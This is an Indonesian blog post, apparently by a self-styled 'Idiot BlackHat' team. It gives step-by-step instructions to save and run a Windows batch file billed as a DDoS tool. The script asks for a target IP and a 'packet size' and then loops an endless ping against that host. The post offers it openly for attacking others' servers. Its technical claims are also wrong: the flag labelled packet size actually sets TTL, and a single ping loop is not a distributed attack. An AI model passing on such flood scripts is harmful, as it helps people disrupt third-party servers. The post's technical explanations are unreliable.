Oke langsung sadja gan.
1. Bahan-bahan
- Internet (internet penting buat ddos).
- Pc.
- Notepad
2. Langkah-langkah
- pertama kita buka dulu notepad, dan tempel code dibawah ini.
@echo off
mode 67,16
title DDOS Attacking Server
color 0b
cls
echo ==================================
echo = Idiot BlackHat DDOS =
echo ==================================
echo.
echo ++++++++++++++++++++++++++++++++++
echo + Author : Anonimokerl +
echo + TEAM : Idiot BlackHat +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo * Masukan IP / Host Target *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
File Name : Ddos.bat
Save as type : all files
- Selesai.
Sekian dulu, mohon maaf kalo ada yang kurang jelas.
Kalo ada yang kurang jelas bisa comment aja.
0 comments: